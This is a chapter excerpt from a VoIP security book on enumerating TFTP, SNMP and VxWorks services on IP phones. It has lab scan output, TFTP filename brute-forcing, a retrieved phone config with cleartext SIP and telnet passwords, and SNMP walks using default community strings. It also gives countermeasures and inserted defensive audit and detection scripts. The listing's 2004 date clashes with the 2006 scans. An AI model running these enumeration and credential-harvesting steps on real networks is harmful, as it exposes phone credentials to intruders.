Enumeration of Other VoIP Support Services

Obviously, VoIP platforms rely on a plethora of common network services such as DNS, Microsoft Active Directory, LDAP, RADIUS, and so on. Enumerating most of these common services from a typical security auditing perspective is already covered in great detail in the main Hacking Exposed, Fifth Edition book, which we highly recommend reading. Rather than reiterate a lot of general security enumeration techniques already covered elsewhere, we've tried to limit the scope of this section to enumerating those main support services that most VoIP devices rely on.

Attack Enumerating TFTP Servers

Popularity: 5
Simplicity: 9
Impact: 9
Risk Rating: 7

The majority of the phones that we set up in our test environment rely upon a Trivial File Transfer Protocol (TFTP) server for downloading their configuration settings. TFTP is dangerously insecure in that it requires no authentication to upload or fetch a file. This means that in the majority of enterprise VoIP installations, a TFTP server is typically exposed to the network so phones can download their initial settings each time they power up.

When booting up each time, many phones first try to download a configuration file. Sometimes this configuration file is a derivative of the phone's MAC address. For instance, our Avaya 4620 phone tries to download the files 46xxsettings.txt and 46xxupgrade.scr each time it is powered on. Our Cisco 7912 IP phone tries to download the files SIPDefault.cnf and SEP001562EA69E8.cnf (001562EA69E8 is its MAC address) each time from the same TFTP server. One of the easiest ways for a hacker to compromise a VoIP network is to focus first on the TFTP servers.

The first step to enumerating the files on a TFTP server is locating the server within the network. As you saw in the Googling exercises in Chapter 1, this might be as easy as reading the TFTP server IP address from the web-based configuration readout. As a refresher, let's scan our target deployment again simply looking for listening services on UDP port 69 (tftp):

 Starting nmap 3.81 (http://www.insecure.org/nmap/) at 2006-03-07 01:56 CST
 Interesting ports on 192.168.1.21:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:04:13:24:23:8D (Snom Technology AG)

 Interesting ports on 192.168.1.22:
 PORT   STATE         SERVICE
 69/udp open|filtered tftp
 MAC Address: 00:0F:34:11:80:45 (Cisco Systems)

 Interesting ports on 192.168.1.23:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:15:62:86:BA:3E (Unknown)

 Interesting ports on 192.168.1.24:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology)

 Interesting ports on 192.168.1.25:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks)

 Interesting ports on 192.168.1.27:
 PORT   STATE         SERVICE
 69/udp open|filtered tftp
 MAC Address: 00:04:F2:03:15:46 (Circa Communications)

 Interesting ports on 192.168.1.51:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:04:13:23:34:95 (Snom Technology AG)

 Interesting ports on 192.168.1.53:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:04:0D:50:40:B0 (Avaya)

 Interesting ports on 192.168.1.54:
 PORT   STATE  SERVICE
 69/udp closed tftp
 MAC Address: 00:0E:08:DA:24:AE (Sipura Technology)

 Interesting ports on 192.168.1.55:
 PORT   STATE         SERVICE
 69/udp open|filtered tftp
 MAC Address: 00:E0:11:03:03:97 (Uniden SAN Diego R&D Center)

 Interesting ports on 192.168.1.57:
 PORT   STATE         SERVICE
 69/udp open|filtered tftp
 MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics)

 Interesting ports on 192.168.1.103:
 PORT   STATE         SERVICE
 69/udp open|filtered tftp
 MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.)

 Interesting ports on domain2 (192.168.1.104):
 PORT   STATE  SERVICE
 69/udp closed tftp

As you can see, we found a TFTP server on 192.168.1.103 (also our Asterisk server). Most automated banner-grabbing utilities will identify the TFTP service running on this server. The reason we wanted to run Nmap again is to remind you that the MAC addresses we'll shortly need for enumerating some of the configuration filenames are all available from these scanning results.

As opposed to normal FTP, TFTP provides no mechanism for a directory listing (in other words, no "ls"). This means that unless you already know the names of the files you wish to download, you're out of luck figuring out what else is sitting in the same directory. This is where the MAC addresses will come in handy because we know the general format for Cisco and other phone configuration files is often based on the MAC address. Through brute-force trial-and-error, you can enumerate and download many of the configuration files on a TFTP server.

Companion Web Site: We have provided an up-to-date list of configuration filenames on our website (http://www.hackingvoip.com) for use with manual or automated TFTP enumeration. Obviously, you will need to modify some of the names with the appropriate MAC addresses gleaned from your own scanning.

Here's an example of enumerating our TFTP server manually by tweaking the list of brute-forcing names we've provided. We use a tool called TFTPbrute.pl, which was written by our colleagues who authored the book Hacking Exposed Cisco Networks (McGraw-Hill, 2006). The tool is available for download from http://www.hackingexposedcisco.com/tools.

 [root@attacker]# perl tftpbrute.pl 192.168.1.103 brutefile.txt 100
 tftpbrute.pl, , V 0.1
 TFTP file word database: brutefile.txt
 TFTP server 192.168.1.103
 Max processes 100
  Processes are: 1
  Processes are: 2
  Processes are: 3
  Processes are: 4
  Processes are: 5
  Processes are: 6
  Processes are: 7
  Processes are: 8
  Processes are: 9
  Processes are: 10
  Processes are: 11
  Processes are: 12
 *** Found TFTP server remote filename : sip.cfg
 *** Found TFTP server remote filename : 46xxsettings.txt
  Processes are: 13
  Processes are: 14
 *** Found TFTP server remote filename : sip_4602D02A.txt
 *** Found TFTP server remote filename : XMLDefault.cnf.xml
 *** Found TFTP server remote filename : SipDefault.cnf
 *** Found TFTP server remote filename : SEP001562EA69E8.cnf

Now that we know the name of the configuration file to the target 7960 Cisco IP Phone, we can download it and look for any useful information. For example:

 [root@attacker]# tftp 192.168.1.103
 tftp> get SEP001562EA69E8.cnf
 [root@attacker]# cat SEP001562EA69E8.cnf
 # SIP Configuration Generic File (start)

 # Line 1 Settings
 line1_name: "502"                       ; Line 1 Extension\User ID
 line1_displayname: "502"                ; Line 1 Display Name
 line1_authname: "502"                   ; Line 1 Registration Authentication
 line1_password: "1234"                  ; Line 1 Registration Password

 # Line 2 Settings
 line2_name: ""                          ; Line 2 Extension\User ID
 line2_displayname: ""                   ; Line 2 Display Name
 line2_authname: "UNPROVISIONED"         ; Line 2 Registration Authentication
 line2_password: "UNPROVISIONED"         ; Line 2 Registration Password

 # Line 3 Settings
 line3_name: ""                          ; Line 3 Extension\User ID
 line3_displayname: ""                   ; Line 3 Display Name
 line3_authname: "UNPROVISIONED"         ; Line 3 Registration Authentication
 line3_password: "UNPROVISIONED"         ; Line 3 Registration Password

 # Line 4 Settings
 line4_name: ""                          ; Line 4 Extension\User ID
 line4_displayname: ""                   ; Line 4 Display Name
 line4_authname: "UNPROVISIONED"         ; Line 4 Registration Authentication
 line4_password: "UNPROVISIONED"         ; Line 4 Registration Password

 # Line 5 Settings
 line5_name: ""                          ; Line 5 Extension\User ID
 line5_displayname: ""                   ; Line 5 Display Name
 line5_authname: "UNPROVISIONED"         ; Line 5 Registration Authentication
 line5_password: "UNPROVISIONED"         ; Line 5 Registration Password

 # Line 6 Settings
 line6_name: ""                          ; Line 6 Extension\User ID
 line6_displayname: ""                   ; Line 6 Display Name
 line6_authname: "UNPROVISIONED"         ; Line 6 Registration Authentication
 line6_password: "UNPROVISIONED"         ; Line 6 Registration Password

 # NAT/Firewall Traversal
 nat_address: ""
 voip_control_port: "5060"
 start_media_port: "16384"
 end_media_port: "32766"

 # Phone Label (Text desired to be displayed in upper right corner)
 phone_label: "cisco 7960"               ; Has no effect on SIP messaging

 # Time Zone phone will reside in
 time_zone: EST

 # Phone prompt/password for telnet/console session
 phone_prompt: "Cisco7960"               ; Telnet/Console Prompt
 phone_password: "abc"                   ; Telnet/Console Password

 # SIP Configuration Generic File (stop)

Yikes! Not only does an attacker now know the SIP username and password for this user/phone, but also the administrative password for the telnet service, which also happens to be enabled on this phone.
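The following audit script is an added example, not part of the original text or of any vendor tool. It shows how an administrator could scan the files in their own TFTP root for provisioned secrets in the `key: "value" ; comment` format of the listing above. The `*_password` / `*_authname` key pairing, the 8-character threshold, and the abbreviated sample are assumptions made for illustration.

```python
import re

# Matches lines such as:  line1_password: "1234"   ; Line 1 Registration Password
# Values may be quoted ("502") or bare (EST); anything after ';' is a comment.
SETTING_RE = re.compile(r'^\s*([A-Za-z0-9_]+)\s*:\s*(?:"([^"]*)"|([^;#\s]*))')

# Values that mean "nothing provisioned here" in the listing above.
PLACEHOLDERS = {"", "UNPROVISIONED"}


def parse_settings(text):
    """Return {key: value} for every 'key: value ; comment' line."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        match = SETTING_RE.match(line)
        if match:
            quoted, bare = match.group(2), match.group(3)
            settings[match.group(1)] = quoted if quoted is not None else bare
    return settings


def audit_secrets(settings, min_len=8):
    """Return [(key, [reasons])] for every provisioned *_password value.

    The secret itself is never returned, so the report can be shared.
    """
    findings = []
    for key, value in sorted(settings.items()):
        if not key.endswith("_password") or value in PLACEHOLDERS:
            continue
        reasons = ["cleartext secret in a file served without authentication"]
        if len(value) < min_len:
            reasons.append(f"shorter than {min_len} characters")
        if value.isdigit():
            reasons.append("digits only")
        # Assumed pairing: lineN_password goes with lineN_authname.
        authname = settings.get(key.replace("_password", "_authname"))
        if authname and authname == value:
            reasons.append("identical to the matching authname")
        findings.append((key, reasons))
    return findings


# Abbreviated sample in the format of the listing above (raw string because
# the comments contain a backslash).
SAMPLE_CONFIG = r"""
# Line 1 Settings
line1_name: "502"                       ; Line 1 Extension\User ID
line1_authname: "502"                   ; Line 1 Registration Authentication
line1_password: "1234"                  ; Line 1 Registration Password
# Line 2 Settings
line2_authname: "UNPROVISIONED"         ; Line 2 Registration Authentication
line2_password: "UNPROVISIONED"         ; Line 2 Registration Password
time_zone: EST
phone_password: "abc"                   ; Telnet/Console Password
"""

if __name__ == "__main__":
    for key, reasons in audit_secrets(parse_settings(SAMPLE_CONFIG)):
        print(f"{key}: " + "; ".join(reasons))
```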

Note 

Security researcher Ofir Arkin was one of the first to document many of these types of attacks against a Cisco environment in his paper "The Trivial Cisco IP Phones Compromise" (http://www.sys-security.com/archive/papers/The_Trivial_Cisco_IP_Phones_Compromise.pdf).

Countermeasures TFTP Enumeration Countermeasures

While an easy recommendation would be to avoid using TFTP in your VoIP environment, the reality is that many VoIP phones require it and give you no other choice for upgrading or configuration changes. Some of the newer models are beginning to migrate to web configuration instead; however, TFTP will be a necessary evil for the foreseeable future.

Two tips to mitigate the threat of TFTP enumeration include the following:

  • Restrict access to TFTP servers by using firewall rules that only allow certain IP address ranges to contact the TFTP server. This prevents arbitrary scanning; however, UDP source addresses can be spoofed.

  • Segment the IP phones, TFTP servers, SIP servers, and general VoIP support infrastructure on a separate switched VLAN.
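Because source-address filtering can be spoofed, monitoring the TFTP server complements the two tips above. The following detection sketch is an added example, not from the original text. It decodes TFTP read requests and error replies (RFC 1350) and flags clients that collect many "file not found" replies or ask for a MAC-named configuration file that does not match their own MAC address. It assumes the capture is taken on the voice VLAN, so the layer-2 source MAC is the client's own; all addresses, guessed filenames, and the threshold are constructed.

```python
import re
import struct
from collections import defaultdict

OP_RRQ, OP_ERROR = 1, 5          # RFC 1350 opcodes
ERR_FILE_NOT_FOUND = 1           # RFC 1350 error code
# Twelve hex digits standing alone in a filename, as in SEP<MAC>.cnf
MAC_IN_NAME = re.compile(r"(?<![0-9a-f])[0-9a-f]{12}(?![0-9a-f])", re.IGNORECASE)


def parse_tftp(payload):
    """Decode RRQ and ERROR packets; return None for anything else."""
    if len(payload) < 4:
        return None
    (opcode,) = struct.unpack("!H", payload[:2])
    if opcode == OP_RRQ:
        # Layout: filename NUL mode NUL  -> split yields at least 3 parts
        parts = payload[2:].split(b"\x00")
        if len(parts) < 3:
            return None
        return ("RRQ", parts[0].decode("ascii", "replace"))
    if opcode == OP_ERROR:
        (code,) = struct.unpack("!H", payload[2:4])
        return ("ERROR", code)
    return None


def normalise_mac(mac):
    """'00:15:62:EA:69:E8' -> '001562ea69e8'"""
    return re.sub(r"[^0-9a-f]", "", mac.lower())


def detect_enumeration(events, max_misses=5):
    """events: iterable of (client_ip, client_mac, udp_payload), where the
    payload is either the client's request or the server's reply to it.
    Returns {client_ip: [reasons]} for clients that look like enumerators."""
    misses = defaultdict(int)
    foreign = defaultdict(set)
    for ip, mac, payload in events:
        packet = parse_tftp(payload)
        if packet is None:
            continue
        kind, value = packet
        if kind == "RRQ":
            found = MAC_IN_NAME.search(value)
            if found and found.group(0).lower() != normalise_mac(mac):
                foreign[ip].add(value)
        elif value == ERR_FILE_NOT_FOUND:
            misses[ip] += 1

    alerts = {}
    for ip in set(misses) | set(foreign):
        reasons = []
        if foreign.get(ip):
            reasons.append("requested files named for another device's MAC: "
                           + ", ".join(sorted(foreign[ip])))
        if misses.get(ip, 0) > max_misses:
            reasons.append(f"{misses[ip]} 'file not found' replies "
                           f"(threshold {max_misses})")
        if reasons:
            alerts[ip] = reasons
    return alerts


# --- Constructed sample traffic -------------------------------------------
def rrq(name):
    return struct.pack("!H", OP_RRQ) + name.encode() + b"\x00octet\x00"


def error(code, message):
    return struct.pack("!HH", OP_ERROR, code) + message.encode() + b"\x00"


PHONE = ("192.0.2.23", "00:15:62:EA:69:E8")    # boots and fetches its own files
OTHER = ("192.0.2.200", "02:00:00:00:00:01")   # not a phone

SAMPLE_EVENTS = [
    (*PHONE, rrq("SIPDefault.cnf")),
    (*PHONE, rrq("SEP001562EA69E8.cnf")),
]
for i in range(6):
    SAMPLE_EVENTS.append((*OTHER, rrq(f"guess{i}.cfg")))
    SAMPLE_EVENTS.append((*OTHER, error(ERR_FILE_NOT_FOUND, "File not found")))
SAMPLE_EVENTS.append((*OTHER, rrq("SEP001562EA69E8.cnf")))

if __name__ == "__main__":
    for ip, reasons in detect_enumeration(SAMPLE_EVENTS).items():
        print(ip, "->", "; ".join(reasons))
```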

Attack SNMP Enumeration

Popularity: 7
Simplicity: 7
Impact: 10
Risk Rating: 8

Simple Network Management Protocol (SNMP) version 1 is another inherently insecure protocol used by many VoIP devices, as you learned in Chapter 2. Let's use Nmap again to see if we can find any devices that support it. Because SNMP typically listens on UDP port 162, we'll start off with

 [root@domain2 ~]# nmap -sU 192.168.1.1-254 -p 162 

Or you can use a graphical SNMP probing tool such as SolarWinds SNMPSweep, as shown in Figure 3-8.

Figure 3-8: SNMPSweep shows that the Avaya IP phone and Zultys Zip2 phone both responded to SNMP probes with the "public" community string.

Based on the information shown in the figure, we now use the "public" community string to enumerate most of the configuration settings on those phones. The tool snmpwalk (http://net-snmp.sourceforge.net/docs/man/snmpwalk.html) is useful for such a task:

 [root@domain2 ~]# snmpwalk -c public -v 1 192.168.1.53

The SNMP MIB exposes interesting configuration information about the Avaya phone, including its vendor type (Avaya), underlying operating system (VxWorks), MAC address, and ports of possible UDP-related services that might be of interest for further enumeration (68, 161, 1031, 1032, 1033, 5060). Now that we know this is an Avaya phone, we can easily find specific SNMP MIB information for this manufacturer from Google to query for further information on this device. You can also use SolarWinds' graphical tool, SNMP MIB browser, which has a built-in MIB database and is shown in Figure 3-9. We eventually determine that 1.3.6.1.4.1.6889 is the appropriate SNMP OID, which we can use for another, more detailed SNMP query:

Figure 3-9: SolarWinds' MIB browser finding the Avaya OID

 [root@domain2 ~]# snmpwalk -c public -v 1 192.168.1.53 1.3.6.1.4.1.6889

This vendor-specific SNMP query gave us even more information about the phone, including its SIP username (503), DNS server, configuration HTTP server IP address (192.168.1.104), its SIP domain (domain2), and other juicy configuration details. SolarWinds also has a graphical equivalent to snmpwalk called SNMP MIB Browser, which includes the database used earlier to find the Avaya OID.

Countermeasures SNMP Enumeration Countermeasures

If possible, disable SNMP support on your phones. Change the default public and private SNMP community strings on all other network devices running SNMP v1 and v2. Upgrade any devices to SNMP v3, which supports strong authentication rather than simple text strings (public/private community strings).

Attack Enumerating VxWorks VoIP Devices

Popularity:

2

Simplicity:

3

Impact:

10

Risk Rating:

5

Many IP phones are developed on embedded real-time operating systems, such as VxWorks (http://www.vxworks.com). Before the phone actually ships, some vendors forget to turn off the remote debugging feature of VxWorks, which allows for administrative debugging access to the device. The VxWorks remote debugger typically listens on UDP or TCP port 17185 and allows connections from a remote debugging client.

Let's try scanning our test deployment with Nmap to see if any of our phones respond on those ports:

[root@domain2 ~]# nmap -sT 192.168.1.1-254 -p 17185

Starting nmap 3.81 (http://www.insecure.org/nmap/) at 2006-03-11 22:19 CST
Interesting ports on 192.168.1.21:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:04:13:24:23:8D (Snom Technology AG)

Interesting ports on 192.168.1.22:
PORT      STATE    SERVICE
17185/tcp filtered unknown
MAC Address: 00:0F:34:11:80:45 (Cisco Systems)

Interesting ports on 192.168.1.23:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:15:62:86:BA:3E (Unknown)

Interesting ports on 192.168.1.24:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology)

Interesting ports on 192.168.1.25:
PORT      STATE    SERVICE
17185/tcp filtered unknown
MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks)

Interesting ports on 192.168.1.27:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:04:F2:03:15:46 (Circa Communications)

Interesting ports on 192.168.1.51:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:04:13:23:34:95 (Snom Technology AG)

Interesting ports on 192.168.1.53:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:04:0D:50:40:B0 (Avaya)

Interesting ports on 192.168.1.54:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:0E:08:DA:24:AE (Sipura Technology)

Interesting ports on 192.168.1.57:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics)

Interesting ports on 192.168.1.103:
PORT      STATE  SERVICE
17185/tcp closed unknown
MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.)

Interesting ports on domain2 (192.168.1.104):
PORT      STATE  SERVICE
17185/tcp closed unknown

Nmap finished: 109 IP addresses (12 hosts up) scanned in 19.239 seconds

[root@domain2 ~]# nmap -sU 192.168.1.1-254 -p 17185

Starting nmap 3.81 (http://www.insecure.org/nmap/) at 2006-03-11 22:21 CST
Interesting ports on 192.168.1.21:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:04:13:24:23:8D (Snom Technology AG)

Interesting ports on 192.168.1.22:
PORT      STATE         SERVICE
17185/udp open|filtered wdbrpc
MAC Address: 00:0F:34:11:80:45 (Cisco Systems)

Interesting ports on 192.168.1.23:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:15:62:86:BA:3E (Unknown)

Interesting ports on 192.168.1.24:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:0E:08:DA:DA:17 (Sipura Technology)

Interesting ports on 192.168.1.25:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:0B:82:06:4D:37 (Grandstream Networks)

Interesting ports on 192.168.1.27:
PORT      STATE         SERVICE
17185/udp open|filtered wdbrpc
MAC Address: 00:04:F2:03:15:46 (Circa Communications)

Interesting ports on 192.168.1.51:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:04:13:23:34:95 (Snom Technology AG)

Interesting ports on 192.168.1.53:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:04:0D:50:40:B0 (Avaya)

Interesting ports on 192.168.1.54:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:0E:08:DA:24:AE (Sipura Technology)

Interesting ports on 192.168.1.57:
PORT      STATE         SERVICE
17185/udp open|filtered wdbrpc
MAC Address: 00:01:E1:02:C8:DB (Kinpo Electronics)

Interesting ports on 192.168.1.103:
PORT      STATE  SERVICE
17185/udp closed wdbrpc
MAC Address: 00:09:7A:44:15:DB (Louis Design Labs.)

Interesting ports on domain2 (192.168.1.104):
PORT      STATE  SERVICE
17185/udp closed wdbrpc

Nmap finished: 109 IP addresses (12 hosts up) scanned in 9.043 seconds

It looks like the Cisco 7940 (192.168.1.22), Polycom (192.168.1.27), and Zultys (192.168.1.57) might have that port enabled. All an attacker has to do is connect with the native VxWorks debugger to gain full administrative access to that device.

There's really no recourse that an end user can take in this case unless the vendor closes this gaping hole themselves with a patch or update.
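The reading of the two scans above can be made mechanical when auditing your own phone VLAN. The following is an added example, not code from the book: it merges the TCP and UDP results for port 17185 and separates hosts that answered a probe from hosts that were merely silent. The sample input is abridged from the output above, and the function names and verdict labels are assumptions of this example.

```python
import re

# Constructed sample: three hosts abridged from the TCP and UDP scans above.
TCP_SCAN = """Interesting ports on 192.168.1.22:
17185/tcp filtered unknown
MAC Address: 00:0F:34:11:80:45 (Cisco Systems)
Interesting ports on 192.168.1.27:
17185/tcp closed unknown
MAC Address: 00:04:F2:03:15:46 (Circa Communications)
Interesting ports on domain2 (192.168.1.104):
17185/tcp closed unknown"""
UDP_SCAN = """Interesting ports on 192.168.1.22:
17185/udp open|filtered wdbrpc
Interesting ports on 192.168.1.27:
17185/udp open|filtered wdbrpc
Interesting ports on domain2 (192.168.1.104):
17185/udp closed wdbrpc"""

HOST = re.compile(r"Interesting ports on (?:\S+ \()?([\d.]+)\)?:")
PORT = re.compile(r"17185/(tcp|udp)\s+(\S+)")
MAC = re.compile(r"MAC Address: \S+ \((.+)\)")

def parse(scan_text):
    """Map each IP to its port 17185 state per protocol and its MAC vendor."""
    hosts, cur = {}, None
    for line in scan_text.splitlines():
        if m := HOST.search(line):
            cur = hosts.setdefault(m.group(1), {})
        elif cur is not None and (m := PORT.search(line)):
            cur[m.group(1)] = m.group(2)
        elif cur is not None and (m := MAC.search(line)):
            cur["vendor"] = m.group(1)
    return hosts

def triage(*scans):
    """Merge several scans and give one verdict per host for the debug port."""
    verdicts = {}
    for ip, info in parse("\n".join(scans)).items():
        states = {info.get("tcp"), info.get("udp")}
        if "open" in states:             # a probe was answered: agent reachable
            verdicts[ip] = "exposed"
        elif "open|filtered" in states:  # UDP silence: listening OR dropped
            verdicts[ip] = "unconfirmed"
        else:                            # refused (closed) or blocked (filtered)
            verdicts[ip] = "not exposed"
    return verdicts

if __name__ == "__main__":
    for ip, verdict in triage(TCP_SCAN, UDP_SCAN).items():
        print(ip, verdict)
```

An "unconfirmed" verdict is why the text says these phones only "might" have the port enabled: a UDP probe that draws no reply looks the same whether the service is listening or a filter dropped the packet, so those hosts need to be checked against vendor firmware notes and network ACLs.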

Note 

The VoIP service enumeration examples covered in this chapter span the wealth of other support services that may exist in a VoIP network. Rather than reinvent the wheel, we recommend picking up a copy of Hacking Exposed, Fifth Edition by Stuart McClure, Joel Scambray, and George Kurtz (McGraw-Hill, 2005), which covers other enumeration examples not specific to VoIP that may be useful in your enumeration efforts.



Hacking Exposed VoIP: Voice Over IP Security Secrets & Solutions
ISBN: 0072263644
Year: 2004
Pages: 158
